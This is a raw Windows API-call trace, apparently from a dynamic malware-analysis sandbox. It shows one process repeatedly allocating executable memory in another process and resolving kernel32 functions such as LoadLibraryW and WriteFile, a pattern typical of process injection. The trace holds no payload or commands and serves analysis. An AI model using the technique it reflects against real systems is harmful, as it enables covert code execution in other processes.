	[0197.764] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.764] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.765] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.765] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.765] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.765] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.765] lstrlenA (lpString="LockFile") returned 8
	[0197.765] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.766] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.766] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.766] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.766] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.766] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.766] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.767] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.767] lstrlenA (lpString="OutputDebugStringA") returned 18
	[0197.767] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.767] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.767] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.767] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.767] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.768] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.768] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.768] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.768] lstrlenA (lpString="GetDiskFreeSpaceW") returned 17
	[0197.768] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.769] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.769] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.769] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.769] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.769] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.769] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.770] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.770] lstrlenA (lpString="InterlockedCompareExchange") returned 26
	[0197.770] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.770] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.770] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.770] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.771] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.771] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.771] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.771] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.771] lstrlenA (lpString="WriteFile") returned 9
	[0197.771] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.772] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.772] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.772] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.772] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.772] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.772] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.773] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.773] lstrlenA (lpString="GetFullPathNameW") returned 16
	[0197.773] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.773] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.774] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.774] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.774] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.774] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.774] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.774] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.774] lstrlenA (lpString="HeapFree") returned 8
	[0197.774] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.775] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.775] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.775] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.775] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.775] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.776] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.776] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.776] lstrlenA (lpString="HeapCreate") returned 10
	[0197.776] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.776] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.777] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.777] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.777] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.777] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.777] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.778] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.778] lstrlenA (lpString="TryEnterCriticalSection") returned 23
	[0197.778] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.778] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.778] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.778] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.779] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.779] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.779] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.779] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.779] lstrlenA (lpString="ReadFile") returned 8
	[0197.779] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.780] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.780] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.780] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.780] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.780] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.780] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.781] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.781] lstrlenA (lpString="AreFileApisANSI") returned 15
	[0197.781] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.781] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.824] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.824] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.824] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.824] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.825] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.825] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.825] lstrlenA (lpString="lstrlenA") returned 8
	[0197.825] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.825] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.826] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.826] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.826] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.826] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.826] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.826] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.826] lstrlenA (lpString="CloseHandle") returned 11
	[0197.826] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.827] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.827] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.827] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.827] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.827] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.828] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.828] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.828] lstrlenA (lpString="ExpandEnvironmentStringsA") returned 25
	[0197.828] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.828] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.829] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.829] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.829] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.829] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.829] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.829] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.829] lstrlenA (lpString="WTSGetActiveConsoleSessionId") returned 28
	[0197.829] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x1d, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.830] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.830] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.830] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.830] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.830] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.831] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.831] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.831] lstrlenA (lpString="DeleteCriticalSection") returned 21
	[0197.831] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.831] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.832] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.832] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.832] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.832] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.832] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.832] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.832] lstrlenA (lpString="WaitForSingleObject") returned 19
	[0197.832] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.833] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.833] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.833] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.833] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.833] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.834] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.834] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.834] lstrlenA (lpString="InitializeCriticalSection") returned 25
	[0197.834] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.834] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.835] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.835] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.835] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.835] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.835] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.835] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.835] lstrlenA (lpString="LeaveCriticalSection") returned 20
	[0197.835] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.836] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.836] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.836] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.836] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.836] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.837] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.837] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.837] lstrlenA (lpString="EnterCriticalSection") returned 20
	[0197.837] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.837] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.838] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.838] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.838] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.838] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.838] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.838] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.838] lstrlenA (lpString="LoadLibraryW") returned 12
	[0197.838] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.839] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.839] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.839] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.839] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.839] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.840] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.840] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.840] lstrlenA (lpString="GetVersionExW") returned 13
	[0197.840] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.841] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.841] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.841] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.841] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.841] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.841] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.842] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.842] lstrlenA (lpString="LocalFree") returned 9
	[0197.842] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.842] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.842] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.843] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.843] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.843] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.843] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.843] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.843] lstrlenA (lpString="GetLastError") returned 12
	[0197.843] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.844] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.844] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.844] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.844] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.844] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.845] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.845] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.845] lstrlenA (lpString="lstrlenW") returned 8
	[0197.845] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
